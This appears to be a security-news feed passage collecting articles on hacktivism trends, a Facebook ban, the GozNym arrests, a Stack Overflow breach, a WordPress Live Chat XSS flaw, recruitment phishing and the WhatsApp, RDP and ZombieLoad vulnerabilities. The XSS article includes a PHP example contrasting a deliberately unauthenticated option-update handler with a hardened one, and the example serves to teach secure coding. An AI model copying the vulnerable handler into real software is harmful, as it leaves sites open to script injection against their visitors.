The firm claimed that it recorded 35 incidents in 2015, but the number dropped to just five two years later and two by 2018, with none so far this year.

The number of incidents attributed to Anonymous dropped from eight in 2015 to only one tracked in 2018. This is significant, as the hacktivist collective accounted for almost 45% of all attacks between 2015 and 2018.

Other groups tend to strike once or twice and then disappear, security analyst Camille Singleton explained in a blog post.

“Starting around 2010, Anonymous became one of the most prolific hacktivist groups in the world, reaching a peak of activity in early- to mid-2016, according to IBM X-Force data. Since then, attacks by Anonymous have declined significantly, possibly due to an attrition of key leadership, differences of opinion and a struggle to find an ideological focus,” she said.

“In addition to differences in viewpoint, several cyber actors have sought to masquerade as Anonymous actors over the past three years, using the moniker in an attempt to legitimize their actions or to tarnish the group’s name by connecting their activities to Anonymous.”

Another potential factor in the decline of hacktivist activity is law enforcement activity. Singleton claimed arrests and legal warnings may be acting as an effective deterrent.

“X-Force IRIS internal tracking of related arrests revealed that law enforcement agencies in the US, UK and Turkey have arrested at least 62 hacktivists since 2011,” she added.

“We suspect the actual number is greater than those publicly announced.”

Three of those arrested received sentences in 2018 and 2019 with jail time of three years or greater. One individual, Martin Gottesfeld, 34, of Somerville, was handed a 10-year sentence after DDoS-ing a Boston hospital in 2014.

Facebook Bans Israeli Firm For Election Meddling


Facebook has banned an Israeli company from its platform after detecting a massive, coordinated attempt to influence voters in Africa.

In a blog post yesterday, head of cybersecurity policy, Nathaniel Gleicher, revealed his team had been forced to remove 265 Facebook and Instagram accounts, Facebook Pages, Groups and events involved in “coordinated inauthentic behavior” managed by Archimedes Group.

In total, the shadowy Israeli firm ran 65 Facebook accounts, 161 Pages, 23 Groups, 12 events and four Instagram accounts. Its efforts reached a fairly wide audience, with around 2.8 million accounts following one or more of the Pages, while 5,500 accounts joined at least one of the Groups and around 920 people followed one or more of the Instagram accounts.

“The people behind this network used fake accounts to run Pages, disseminate their content and artificially increase engagement. They also represented themselves as locals, including local news organizations, and published allegedly leaked information about politicians,” Gleicher explained.

“The Page administrators and account owners frequently posted about political news, including topics like elections in various countries, candidate views and criticism of political opponents.”

Originating in Israel, the moves targeted users in Nigeria, Senegal, Togo, Angola, Niger and Tunisia, with Facebook also claiming to have found some suspicious activity in Latin America and Southeast Asia.

Around $812,000 was spent on Facebook ads paid for in Brazilian reals, Israeli shekels and US dollars. They ran from 2012 to 2019, which raises questions about why they weren’t spotted sooner.

“Coordinated inauthentic behavior” is the same moniker used to describe the activity of Russian state-sponsored attempts to interfere with the 2016 US Presidential election, which resulted in the indictment of 13 Russians and three companies from the country.

Archimedes Group, whose tagline is “winning campaigns worldwide,” has now been banned from the social network along with all its subsidiaries and issued with a cease and desist letter.

Europol and US Police Disrupt $100m Cybercrime Gang


Europol and US authorities are claiming victory after “dismantling” a major international cybercrime gang that used the GozNym banking trojan in an attempt to steal $100m from businesses.

A federal indictment was unsealed yesterday charging 10 members of the group with conspiracy to commit computer fraud, conspiracy to commit wire fraud and bank fraud, and conspiracy to commit money laundering. An eleventh has already been charged in a previous indictment.

Five of the gang are based in Russia and will therefore probably escape justice. However, the leader of the group, Alexander Konovolov — aka “NoNe,” and “none_1” — 35, of Tbilisi, Georgia, is being prosecuted in his home country, along with his alleged right-hand man Marat Kazandjian, aka “phant0m,” 31, of Kazakhstan and Tbilisi.

Another man, Eduard Malanici, aka “JekaProf,” is being prosecuted in his native Moldova for charges relating to alleged provision of crypting services, while Gennady Kapkanov — aka “Hennadiy Kapkanov,” “flux,” “ffhost,” “firestarter,” and “User 41” — 36, of Poltava, Ukraine, is being prosecuted in the eastern European nation for charges of bulletproof hosting for the group via the infamous Avalanche network.

He was arrested in 2018 after shooting an assault rifle at Ukrainian police searching his flat, while another man, Krasimir Nikolov, of Varna, Bulgaria, was extradited to the US in 2016 on charges of being the group’s account takeover specialist.

Each man had a specific role and was apparently recruited from Russian-speaking dark web forums. The GozNym malware was distributed to around 41,000 victim computers via phishing emails. Once they captured the victim’s online banking credentials, accounts were accessed and funds transferred to third-party accounts under the group’s control.

“International law enforcement has recognized that the only way to truly disrupt and defeat transnational, anonymized networks is to do so in partnership,” said Pennsylvania US attorney Scott Brady. 

“The collaborative and simultaneous prosecution of the members of the GozNym criminal conspiracy in four countries represents a paradigm shift in how we investigate and prosecute cybercrime.”

Roy Rashti, cybersecurity expert at BitDam, argued that the dismantling of this network is just a drop in the ocean, but a welcome move nonetheless.

“The ‘Goz’ in GozNym stands for the notorious Gozi banker malware which, although not new, was very successfully co-opted and iterated by hackers,” he added.

“This provides yet another example of how adversaries tweak known attacks to bypass legacy security solutions to reach and exploit the end user. This strategy allows cybercrime groups to operate like any successful business — with efficiency, dynamism and always staying one step ahead. That is of course, until they get caught.”

Stack Overflow Q&A platform announced a data breach

The popular question-and-answer platform for programmers Stack Overflow announced on Thursday that it has suffered a data breach.

Another data breach makes the headlines; this time the victim is the popular question-and-answer platform for programmers Stack Overflow.

The company announced on Thursday that it has discovered unauthorized access to its production systems over the weekend.

The company immediately launched an investigation. At this time it has not shared technical details about the intrusion; it has only revealed that it found no evidence that customer or user data was compromised.

“Over the weekend, there was an attack on Stack Overflow. We have confirmed that some level of production access was gained on May 11,” reads a data breach notification published by Mary Ferguson, VP of Engineering at Stack Overflow. “We discovered and investigated the extent of the access and are addressing all known vulnerabilities.”

Stack Overflow has more than 10 million registered users and it has over 50 million unique visitors every month. The Q&A platform is the most important website of the Stack Exchange Network.


In December 2018, another popular Q&A platform, Quora, revealed that it had suffered a data breach.

Unknown hackers breached its systems and accessed the data of 100 million users; the exposed data included names, email addresses and hashed passwords.

Pierluigi Paganini

(SecurityAffairs – data breach, hacking)

The post Stack Overflow Q&A platform announced a data breach appeared first on Security Affairs.

XSS flaw in WordPress Live Chat Plugin lets attackers compromise WP sites

A vulnerability in the Live Chat Support plugin for WordPress could be exploited by attackers to inject malicious scripts into websites using it.

Researchers at Sucuri have discovered a stored/persistent cross-site scripting (XSS) vulnerability in the WP Live Chat Support plugin for WordPress.

The flaw could be exploited by remote, unauthenticated attackers to inject malicious scripts into websites running the WordPress CMS with the Live Chat Support plugin installed; the attacker does not need an account on the affected website.

It has been estimated that the plugin currently has over 60,000 installs; it implements a chat solution for customer engagement and conversion.

Versions of the plugin prior to 8.0.27 are vulnerable to stored/persistent XSS.

Experts pointed out that the attack to trigger this issue can be automated to hit a broad range of victims.

An XSS vulnerability could allow hackers to inject malicious code in websites and compromise visitors’ accounts or expose them to modified page content. A cross-site scripting vulnerability may be used by attackers to bypass access controls such as the same-origin policy. 

An XSS is persistent when the malicious code is added to a section of the site that is stored on the server. Every time a visitor’s browser loads the page, it parses and executes the malicious code.

In this case, an unprotected admin_init hook can be used as the attack vector:

[Image: Live Chat Support Plugin code snippet]

Experts discovered that the function wplc_head_basic lacks proper privilege checks while updating the plugin settings.

[Image: Live Chat Support Plugin code snippet 2]

“It then executes an action hook with even more critical settings,” reads the advisory published by Sucuri. “Since ‘admin_init’ hooks can be called visiting either /wp-admin/admin-post.php or /wp-admin/admin-ajax.php, an unauthenticated attacker could use these endpoints to arbitrarily update the option ‘wplc_custom_js’.”

The content of the option is added to every page that loads the live chat support, allowing attackers to inject malicious JavaScript code on multiple pages.
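To make the described pattern concrete, here is an added illustration written for this page (hypothetical code, not the WP Live Chat Support plugin’s own source): an admin_init handler that saves the wplc_custom_js option with no authorization check, beside a hardened version that requires the manage_options capability and a valid nonce before touching the option. The option name comes from the advisory; the function names, nonce action and settings page are assumptions.

```php
<?php
/*
 * Plugin Name: Example Custom JS Option (vulnerable vs. hardened pattern)
 * Hypothetical plugin written for this page; not WP Live Chat Support's code.
 * Only the option name wplc_custom_js comes from the advisory; function names,
 * the nonce action and the capability are assumptions.
 */

// VULNERABLE PATTERN (kept unhooked): admin_init fires for every request that
// reaches /wp-admin/admin-ajax.php or /wp-admin/admin-post.php, logged in or
// not, so a handler like this lets any visitor overwrite the option.
function example_vulnerable_save_custom_js() {
    if ( isset( $_POST['wplc_custom_js'] ) ) {
        update_option( 'wplc_custom_js', wp_unslash( $_POST['wplc_custom_js'] ) );
    }
}
// add_action( 'admin_init', 'example_vulnerable_save_custom_js' ); // deliberately disabled

// HARDENED PATTERN: same hook, but the request must come from a user who may
// manage options and must carry a nonce tied to this action (CSRF protection).
function example_hardened_save_custom_js() {
    if ( ! isset( $_POST['wplc_custom_js'] ) ) {
        return; // nothing to save on this request
    }
    // Authorization: anonymous visitors and low-privilege users stop here.
    if ( ! current_user_can( 'manage_options' ) ) {
        return;
    }
    // CSRF: the form below emits the matching nonce via wp_nonce_field();
    // check_admin_referer() terminates the request if it is missing or invalid.
    check_admin_referer( 'example_save_custom_js' );

    $js = wp_unslash( $_POST['wplc_custom_js'] );
    update_option( 'wplc_custom_js', $js );
}
add_action( 'admin_init', 'example_hardened_save_custom_js' );

// Settings page (manage_options only) whose form the hardened handler accepts.
// Posting back to the same page is enough: admin_init runs on every admin load.
function example_render_settings_page() {
    ?>
    <form method="post" action="">
        <?php wp_nonce_field( 'example_save_custom_js' ); ?>
        <textarea name="wplc_custom_js" rows="8" cols="80"><?php
            echo esc_textarea( get_option( 'wplc_custom_js', '' ) );
        ?></textarea>
        <?php submit_button( 'Save' ); ?>
    </form>
    <?php
}
function example_register_settings_page() {
    add_options_page(
        'Custom JS', 'Custom JS', 'manage_options',
        'example-custom-js', 'example_render_settings_page'
    );
}
add_action( 'admin_menu', 'example_register_settings_page' );

// Front-end output: whatever is stored is emitted as script on every page.
// It is JavaScript by design, so it cannot be escaped away; controlling WHO
// may write the option is the actual fix.
function example_print_custom_js() {
    $js = get_option( 'wplc_custom_js', '' );
    if ( '' !== $js ) {
        echo '<script>' . $js . "</script>\n";
    }
}
add_action( 'wp_head', 'example_print_custom_js' );
```

On an existing site, the WP-CLI command `wp option get wplc_custom_js` shows what is currently stored, which is a quick post-patch check for script that should not be there.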

To secure your WordPress install, update the WP Live Chat Support plugin to version 8.0.27.

Below is the timeline of the flaw:

  • April 30, 2019: Initial contact attempt.
  • May 15, 2019: Patch is live.

Pierluigi Paganini

(SecurityAffairs – Live Chat Support, Hacking)

The post XSS flaw in WordPress Live Chat Plugin lets attackers compromise WP sites appeared first on Security Affairs.

Pharmaceutical companies exploited by phishing scam targeting job seekers

Earlier this month, two major pharmaceutical giants issued warnings about phishing emails targeting job hunters.

GlaxoSmithKline and AstraZeneca say they are victims of recruitment scams, in which crooks create fake job adverts to obtain people’s personal and financial details. The bogus ads can be hard to spot, because they use legitimate logos and material, and hide the scammers’ email addresses effectively.

How the scam works

Based on AstraZeneca and GlaxoSmithKline’s statements, this is a fairly standard case of recruitment fraud. Job seekers find the fake advert on a recruitment site and provide their CV, which will typically include the applicant’s name, email address, current employer and other personal details.

The scammers will then email the applicant to say they are being considered, before offering them a job. At this point, one of two things will happen.

The scammers might refer the victim to an employment agent (also fake), who will ask for money to complete registration fees. Alternatively, the victim might report directly to the HR department of the bogus employer.

Either way, the final step of the crooks’ plan is to ask for financial details to pay the employee’s salary into. They will instead use the details to steal money, before cutting all ties with the victim.

Why it’s so successful

Recruitment fraud seems like one of the more obvious scams to spot. How could anyone’s alarm not be raised if they are offered a job without an interview?

Unfortunately, red flags like that are ignored in all kinds of phishing scams, and this scheme is a perfect example of why that happens. Most of us know how disheartening it is to send off application after application knowing that you probably won’t ever hear anything back. It’s therefore completely understandable that curiosity and/or hope might get the better of you when you hear that you’re not only in consideration but have also been offered a job.

Sure, you’re likely to be a little suspicious, but it’s a highly respected organisation like GlaxoSmithKline or AstraZeneca, so it must be legitimate, right?

It’s only in retrospect that you see all the clues that should’ve confirmed your suspicions.

What should you be looking for?

GlaxoSmithKline says job hunters can determine the legitimacy of an advert by asking:

  • Are there major spelling or grammatical errors in the communication?
  • What is the sender’s email address? Does this seem consistent with previous communications?
  • Who is sending the email? Search the name online to determine whether it’s a real employee and whether they are the appropriate person to be managing the application process.

It adds that an advert posted by a third party isn’t necessarily fraudulent, but recommends that job hunters research the company to see whether it actually represents the organisation.

It’s not the end of the world if you don’t spot a scam during the application process. The crooks will have your contact details and any other information on your CV, but at least they won’t have your financial details. Preventing that from happening is simple, provided you remain cautious.

AstraZeneca and GlaxoSmithKline remind job hunters that they never ask for money during the recruitment process (no legitimate organisation would). The latter adds that:

If you receive a genuine job offer of a job with us, whether the offer is made directly by us or through an agency, you will not be required to pay any money towards administration fees.

We also recommend that you do not disclose personal or financial details to anyone you do not know.

As is standard, GlaxoSmithKline says that interviewees or those who have been offered jobs might be asked to provide passport information or other personal identification, such as a National Insurance number.

If you receive and accept a job offer, you will obviously have to provide financial information; this will typically be at the same time as you sign your employee contract. However, you should only be asked for account information, which is used to deposit funds, rather than the card number, which is used to withdraw funds.

Can you spot a phishing scam?

The warnings issued by AstraZeneca and GlaxoSmithKline show just how big of a threat phishing poses. The methods for spotting and preventing it are the same no matter what form the scam takes, yet millions of people fall victim in both personal and work environments.

When it comes to recruitment scams, it’s up to individuals to protect their own data, but organisations have a lot more at stake. An employee who can’t spot a malicious email is liable to hand over vast amounts of sensitive information or expose the organisation to further threats. For example, most ransomware attacks are spread via phishing emails.

Organisations can tackle that threat with our Phishing and Ransomware – Human patch e-learning course.

This ten-minute course explains the basics of email-based threats, showing staff how to spot and avoid phishing scams and ransomware.

The post Pharmaceutical companies exploited by phishing scam targeting job seekers appeared first on IT Governance Blog.

WhatsApp, Microsoft and Intel Chip Vulnerabilities

Quickly applying software updates (patching) to mitigate security vulnerabilities is a cornerstone of both a home and business security strategy. So it was interesting to see how the mainstream news media reported the disclosure of three separate ‘major’ security vulnerabilities this week, within WhatsApp, Microsoft Windows and Intel Processors.

WhatsApp

The WhatsApp security flaw by far received the most attention from the media and was very much the leading front-page news story for a day. The WhatsApp vulnerability (CVE-2019-3568) impacts both iPhone and Android versions of the mobile messaging app, allowing an attacker to install surveillance software, namely spyware called Pegasus, which can access the smartphone's call logs and text messages, and can covertly enable and record the camera and microphone.

From a technical perspective, the vulnerability (CVE-2019-3568) can be exploited with a buffer overflow attack against WhatsApp's VOIP stack; this makes remote code execution possible by sending specially crafted SRTCP packets to the phone, a sophisticated exploit.

Should you be concerned?

WhatsApp said it believed only a "select number of users were targeted through this vulnerability by an advanced cyber actor." According to the FT, that threat actor was an Israeli company called ‘NSO Group’. NSO developed the exploit to sell on; it advertises that it sells products to government agencies "for fighting terrorism and aiding law enforcement investigations". NSO products (aka "spyware") are known to be used by government agencies in the UAE, Saudi Arabia and Mexico.

So, if you are one of the 1.5 billion WhatsApp users, and not a Middle East political activist or a Mexican criminal, you probably shouldn’t worry too much about your smartphone having been exploited in the past. If you were exploited, there would be signs, with unusual glitches and activity on your phone. Despite the low risk at present, all WhatsApp users should quickly update their WhatsApp app before criminals attempt to ‘copycat’ NSO Group’s exploitation.

How to Prevent 

Update the WhatsApp app.

iOS

  • Open the Apple AppStore App
  • Search for WhatsApp Messenger
  • Tap 'Update' and the latest version of WhatsApp will be installed
  • App Version 2.19.51 and above fixes the vulnerability

Android

  • Open Google Play Store
  • Tap the menu in the top left corner
  • Go to “My Apps & Games”
  • Tap ‘Update’ next to WhatsApp Messenger and the latest version of WhatsApp will be installed
  • App Version 2.19.134 and above fixes the vulnerability

Microsoft Worm Vulnerability CVE-2019-0708

Making fewer media headlines was the announcement of a new “wormable” vulnerability discovered within various versions of Microsoft’s Windows operating system. The vulnerability CVE-2019-0708 is within Windows' “remote desktop services” component.

This vulnerability is by far the most dangerous vulnerability reported this week, probably this year; it is a similar flaw to the one the WannaCry malware exploited en masse in May 2017. WannaCry was a ransomware worm which severely impacted the operation of several large organisations, including the NHS. It exploited a similar Microsoft Windows vulnerability which enabled the malware to quickly self-propagate (worm) across networks and infect vulnerable systems en masse with ransomware, rendering such systems unusable.
Such is the concern of a second WannaCry style attack due to this flaw, Microsoft has taken the rare step of releasing security patches for their unsupported versions of the Windows operating system, such as Windows XP and Windows Server 2003. 

How to Prevent

Apply the latest Microsoft Windows Update. Microsoft has said anti-virus products will not provide any protection against the exploitation of this vulnerability; therefore applying the Microsoft May 2019 Security Update, as released on Tuesday 14th May 2019, is the only way to be certain of protecting against the exploitation of this critical vulnerability.

Ensure automatic updates is always kept switched on. Windows by default should attempt to download and install the latest security updates, typically you will be prompted to apply the update and accept a reboot, do this without delay. 

To double check, select the Start menu, followed by the gear cog icon on the left. Then, select Update & Security and Windows Update.

Businesses must also seek to apply Microsoft security updates as soon as they are released. Typically large organisations control the release of Microsoft security patches centrally, they should monitor and risk assess the importance of newly released security updates, and then apply across their IT estate at a rate based on risk.

Intel CPU ZombieLoad Vulnerability

There was little mainstream coverage of a third major security vulnerability reported this week. Dubbed 'ZombieLoad', this side-channel processor vulnerability is present in almost every Intel processor made since 2011. This hardware vulnerability is a particular concern to businesses which use or provide cloud services. The flaw can also be mitigated by patching, with Microsoft, Apple, Amazon and Google all releasing security patches. For further information about the Intel CPU vulnerability, read the following posts.

CVE-2019-0708 – A Critical “Wormable” Remote Code Execution Vulnerability in Windows RDP

This is an important security advisory related to a recently patched Critical remote code execution vulnerability in Microsoft Windows Remote Desktop Services (RDP). The vulnerability is identified as “CVE-2019-0708 – Remote Desktop Services Remote Code Execution Vulnerability”. The MSRC blog notes: “This vulnerability is pre-authentication and requires no user interaction.” In other…